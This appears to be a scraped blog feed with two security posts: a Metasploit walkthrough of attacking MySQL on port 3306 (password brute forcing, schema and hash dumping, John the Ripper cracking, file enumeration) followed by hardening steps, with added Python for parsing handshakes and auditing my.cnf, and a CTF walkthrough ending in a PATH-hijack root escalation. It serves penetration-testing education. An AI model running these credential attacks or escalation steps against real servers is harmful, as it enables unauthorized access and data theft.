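CLIENT_SECURE_CONNECTION = 0x00008000   # capability bits from the MySQL protocol
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_STATUS_AUTOCOMMIT = 0x0002       # status flag


def parse_handshake_v10(packet: bytes) -> dict:
    """Decode a raw server greeting, 4-byte packet header included."""
    body_len = int.from_bytes(packet[0:3], "little")
    body = packet[4:4 + body_len]
    if len(body) != body_len or body[0] != 0x0A:
        raise ValueError("not a complete Protocol::HandshakeV10 packet")
    end = body.index(b"\x00", 1)
    version = body[1:end].decode("ascii", "replace")
    pos = end + 1
    thread_id, = struct.unpack_from("<I", body, pos)
    pos += 4
    salt = body[pos:pos + 8]                       # auth-plugin-data part 1
    pos += 8 + 1                                   # plus one filler byte
    cap_low, = struct.unpack_from("<H", body, pos)
    status, = struct.unpack_from("<H", body, pos + 3)   # after the charset byte
    cap_high, = struct.unpack_from("<H", body, pos + 5)
    auth_len = body[pos + 7]                       # total auth-plugin-data length
    pos += 8 + 10                                  # fields above + 10 reserved bytes
    capabilities = cap_low | (cap_high << 16)
    if capabilities & CLIENT_SECURE_CONNECTION:
        part2_len = max(13, auth_len - 8)          # part 2 is NUL padded to 13
        salt += body[pos:pos + part2_len].rstrip(b"\x00")
        pos += part2_len
    plugin = ""
    if capabilities & CLIENT_PLUGIN_AUTH:
        end = body.find(b"\x00", pos)              # some 5.5 builds omit the NUL
        plugin = body[pos:end if end >= 0 else None].decode("ascii", "replace")
    return {"protocol": body[0], "version": version, "thread_id": thread_id,
            "autocommit": bool(status & SERVER_STATUS_AUTOCOMMIT),
            "capabilities": capabilities, "salt": salt, "auth_plugin": plugin}


def build_sample_handshake() -> bytes:
    """Constructed greeting carrying the values the article's target reported."""
    body = (b"\x0a5.5.57-0ubuntu0.14.04.1\x00"
            + struct.pack("<I", 159)               # thread id
            + b"abcdefgh\x00"                      # salt part 1 + filler
            + struct.pack("<HBH", 0xF7FF, 8, SERVER_STATUS_AUTOCOMMIT)  # caps low, latin1, status
            + struct.pack("<H", 0x0008)            # caps high: CLIENT_PLUGIN_AUTH
            + bytes([21]) + b"\x00" * 10           # auth data length, reserved
            + b"ijklmnopqrst\x00"                  # salt part 2 (12 bytes) + NUL
            + b"mysql_native_password\x00")
    return len(body).to_bytes(3, "little") + b"\x00" + body
```

Feeding the first server-to-client packet of each TCP/3306 flow from a capture into parse_handshake_v10 gives a passive inventory of MySQL versions on the network, which is the defender's way to spot an outdated server before a scanner does.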

MYSQL Brute Force Attack

An attacker always tries a brute force attack to steal credentials for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This starts the brute force attack and tries to find a valid username and password combination using the user_file and pass_file wordlists.

From the given image you can observe that our mysql server is not secure against brute force attack, because it shows a matching combination of username: root and password: toor for login.

Once the attacker retrieves valid credentials, he can log in to the mysql server directly to steal or destroy the database information.

Stealing MYSQL information

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

msf > use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From the given image you can observe that it executed the SQL query and dumped the names of the databases.

Extracting MYSQL Schema Information

This module extracts the schema information from a MySQL DB server.

msf > use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) > set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) > set username root

msf auxiliary(mysql_schemadump) > set password toor

msf auxiliary(mysql_schemadump) > run

Here it dumped the schema information for the database "ignite", which has a table named "student" with 5 columns and their column types:

DB: ignite
Table name: student
Columns:
  Last Name   (varchar 30)
  First Name  (varchar 30)
  Student ID  (int 11)
  Major       (varchar 20)
  Dorm        (varchar 20)

Check File Privileges

Open my.cnf file to verify file privileges using following command:

gedit /etc/mysql/my.cnf

Here you can see that the statements given below are uncommented:

  • mysqld_safe
  • mysqld
  • secure_file_priv

If these statements are uncommented, it becomes very easy for an attacker to perform file enumeration.

Mysql File Enumeration

This module will enumerate files and directories using the MySQL load_file feature.

msf > use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_file_enum) > set username root

msf auxiliary(mysql_file_enum) > set password toor

msf auxiliary(mysql_file_enum) > set DIR_LIST /root/Desktop/file.txt

msf auxiliary(mysql_file_enum) > run

It starts checking whether each entry in the given file list exists on the target system.

From the given image you can observe that it found that directories such as /etc, /var and /var/www exist.

Enumerate MYSQL writeable directories

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

msf > use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST /root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we assigned a list of directories so that we can identify which are writable, and from the given image you can observe that it found write permission only for /tmp.

Mysql User Enumeration

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

msf > use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It starts retrieving information such as the list of other user accounts and the user privileges on the mysql server.

From the given image it will be clear to you that it shows the list of accounts with password hashes and the list of users who have GRANT privileges.

As you can see, apart from the user root it has more users, such as sr, with a password hash; you can crack this password using a password cracking tool.

Extract MYSQL Username with Hash Password

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

msf > use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set password toor

msf auxiliary(mysql_hashdump) > run

Now from the screenshot you can see the password hash of every user. Metasploit stores these hash values inside the /tmp folder and later uses John the Ripper to crack the passwords.

Crack Hash Password with John the Ripper

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

msf > use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) > options

msf auxiliary(jtr_mysql_fast) > run

By default it uses the Metasploit wordlist against the hash values that were saved, and starts cracking them.

If you look at the image below you can see that it successfully cracked the double SHA-1 hash and recovered the password in plain text.

Now, using the credentials retrieved above, you can try to log in to the mysql server.

Here you can see that we successfully logged in to the server. Hence an attacker can easily breach the security of the server and steal the important information or modify it.

Secure MYSQL through port forwarding

To secure the mysql server, the admin can move the service from its default port to a specific port. Open the my.cnf file with the following command to make the change:

gedit /etc/mysql/my.cnf

Now change port 3306 to any other port, such as 3000, as shown in the given image; save the changes and restart the service.

service mysql restart

Verify it using nmap command as given below:

nmap -sT 192.168.1.216

Prevent Mysql against brute force attack

To secure the mysql server against brute force, the admin can bind the service to localhost. Open the my.cnf file with the following command to make the change:

gedit /etc/mysql/my.cnf

You only need to enable bind-address by uncommenting it, as shown in the given images, and then restart the service.

service mysql restart

Now let's verify it by running the same dictionary brute force attack as above.

Great!! The attacker is not able to connect to the server, which therefore also resists the brute force attack, as shown in the given image.
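A small audit of the three my.cnf settings this section and the earlier "Check File Privileges" section touch (port, bind-address and secure_file_priv), written as an added example rather than the article's own code. The two config fragments are constructed, and the check assumes MySQL 5.5 semantics, where an unset or empty secure_file_priv places no path restriction on LOAD_FILE and SELECT ... INTO DUMPFILE.

```python
"""Audit the [mysqld] section of a my.cnf for the settings the article adjusts:
port, bind-address and secure_file_priv.  Added example, not code from the
article; both configs are constructed.  Assumes MySQL 5.5 semantics, where an
unset or empty secure_file_priv means no path restriction on file operations."""
import configparser
import ipaddress


def mysqld_settings(cnf_text: str) -> dict:
    """Parse my.cnf text; '!include' lines are dropped and '-' in keys becomes '_' (MySQL treats them alike)."""
    lines = [line for line in cnf_text.splitlines() if not line.lstrip().startswith("!")]
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, inline_comment_prefixes=("#",))
    cp.read_string("\n".join(lines))
    if not cp.has_section("mysqld"):
        return {}
    return {k.replace("-", "_"): (v or "").strip().strip('"')
            for k, v in cp.items("mysqld")}


def audit_mysqld(cnf_text: str) -> list:
    """Return findings as strings; an empty list means all three checks passed."""
    cfg = mysqld_settings(cnf_text)
    findings = []
    bind = cfg.get("bind_address")
    if bind is None:
        findings.append("bind-address unset: mysqld listens on every interface")
    else:
        try:
            addr = ipaddress.ip_address(bind)
        except ValueError:
            addr = None                            # hostname or '*' style value
        if addr is None or addr.is_unspecified:
            findings.append(f"bind-address {bind!r} exposes mysqld to the network")
        elif not addr.is_loopback:
            findings.append(f"bind-address {bind} is not loopback; confirm it is intended")
    if cfg.get("port", "3306") == "3306":
        findings.append("port 3306 is the default scanners probe first")
    if not cfg.get("secure_file_priv"):
        findings.append("secure_file_priv unset or empty: LOAD_FILE and INTO DUMPFILE "
                        "can reach any path the mysql account can")
    return findings


# Constructed fragments: the state the article starts from, and the hardened one.
WEAK_CNF = """[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock

[mysqld]
user = mysql
port = 3306
# bind-address = 127.0.0.1
secure_file_priv =
!includedir /etc/mysql/conf.d/
"""
HARDENED_CNF = """[mysqld]
user = mysql
port = 3000
bind-address = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
"""
```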

The admin should GRANT all privileges only to a specific user from a specific IP address, which prevents attackers from altering the database information.

Now, to grant all privileges, log in to the mysql server and type the following query:

mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.1.220' IDENTIFIED BY 'toor' WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation:

mysql> FLUSH PRIVILEGES;

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post Penetration Testing on MYSQL (Port 3306) appeared first on Hacking Articles.

Categories: Cyber India

Hack the thewall VM (CTF Challenge)

Thu, 21/Sep/2017 - 16:10

Hello friends! Today we are going to take on another CTF challenge known as thewall. The credit for making this VM goes to "Xerubus", and it is another boot2root challenge where we have to root the VM to complete it. You can download the VM here.

Let's Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.0.17, but you will have to find your own):

netdiscover

We did an nmap scan but it showed nothing, so we use arp to check whether the VM is broadcasting anything.

arp -an

We found that it is broadcasting something on the network, so we use Wireshark to check which port it is broadcasting on.

We found that it is broadcasting on port 1337, so we use netcat to listen on port 1337.

nc -lvp 1337

We found it was broadcasting something related to Pink Floyd; we run another nmap scan to check whether this changed anything.

nmap -sV 192.168.0.17

As we can see, port 80 is open, so we open this IP in our browser.

We take a look at the page's source code and find a hexadecimal encoded string.

When we decode it we find an md5 hash and a hint to do steganography.

We crack the md5 hash and find the string divisionbell.

We download the image from the webpage and use steghide to check whether something is hidden behind it. When we try to extract the information it prompts for a password; using the string we recovered above, we find that a text file is hidden behind the image and are able to extract it.

steghide --info pink_floyd.jpg

steghide extract -sf pink_floyd.jpg

When we open the text file we find a base64 encoded string, an md5 hash and a hint to use them on port 1965.

First we decode the base64 string and find SydBarret.

Then we crack the md5 hash and find pinkfloydrocks.

Port enumeration on 1965 shows it is running OpenSSH, so we check whether we can log in with username SydBarret and password pinkfloydrocks.

When we try to log in it tells us that we can only connect through sftp. So we use SydBarrett as username and pinkfloydrocks as password to log in through sftp.

Now that we are inside, we find a file called eclipsed_by_the_moon and download it to our system.

We check what kind of file it is, find that it is a zip file, and extract it using tar.

file eclipsed_by_the_moon

tar xvfz eclipsed_by_the_moon

After extracting the file, we check what kind of file the result is and find that it is a boot sector.

file eclipsed_by_the_moon.lsd

We check whether we can recover any files from the boot sector using testdisk.

testdisk eclipsed_by_the_moon.lsd

We select the image to recover files from.

We select "None" (non-partitioned media), as it is a boot sector.

We go to Advanced to recover files from the image.

We then select the partition from which we want to extract files and choose Undelete to recover them.

We find that an image file is recovered, and we copy it.

We select the directory on our system into which we want to copy the file.

We check the image we just recovered and find a picture of Roger Waters; we also find a password inside the image.

We log in through ssh; enumerating the username we find that RogerWaters is the username and hello_is_there_anybody_in_there is the password.

After getting in, we find that there are different directories for the different users, the Pink Floyd band members.

ls -al

We also find that we have limited access and cannot enter their directories, so we check for binaries available to other users and find that the users NickMason and DavidGilmour have binaries called brick and shineon.

find / -user DavidGilmour 2>/dev/null

find / -user NickMason 2>/dev/null

We don't have access to run the binary shineon, but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.

Now we can access the directory NickMason/. We find an image file inside and use scp to send it to our local system.

scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop

We check the file type and find that it is an audio file, so we rename it from .jpg to .ogg.

When we listen to the audio, we find that Morse code is playing in the background along with the music. We filter the audio frequencies to isolate the Morse code.

.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .. ... .-

We find that the Morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to log in as user RichardWright.

Now we try to run the binary shineon; after running it we find that we can change the folder it uses from DavidGilmour to RichardWright with a symbolic link.

ln -s /bin/ksh /tmp/mail

export PATH=/tmp:$PATH

When we now run shineon we become the user DavidGilmour.

Inside the DavidGilmour/ folder we find a file containing a link.

When we open this link in the browser we find an image with something written on it.

When we decrease the contrast of the image, we find a hexadecimal string.

Then we also send an image file that we find inside the DavidGilmour/ folder to our system using scp.

scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/

We check for strings inside the image file and find the string who_are_you_and_who_am_i.

Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.

We are now in the welcometothemachine group; we move into /var/www/htdocs/welcometothemachine/.

We find a file called PinkFloyd; we run it and find that it asks a question. We answer with the hexadecimal string from the image we found on the webpage.

Now we are given permission to get root, as DavidGilmour is added to the sudoers after running this program.

Now we enter the root/ directory and find the flag, marking the end of the VM challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here


The post Hack the thewall VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India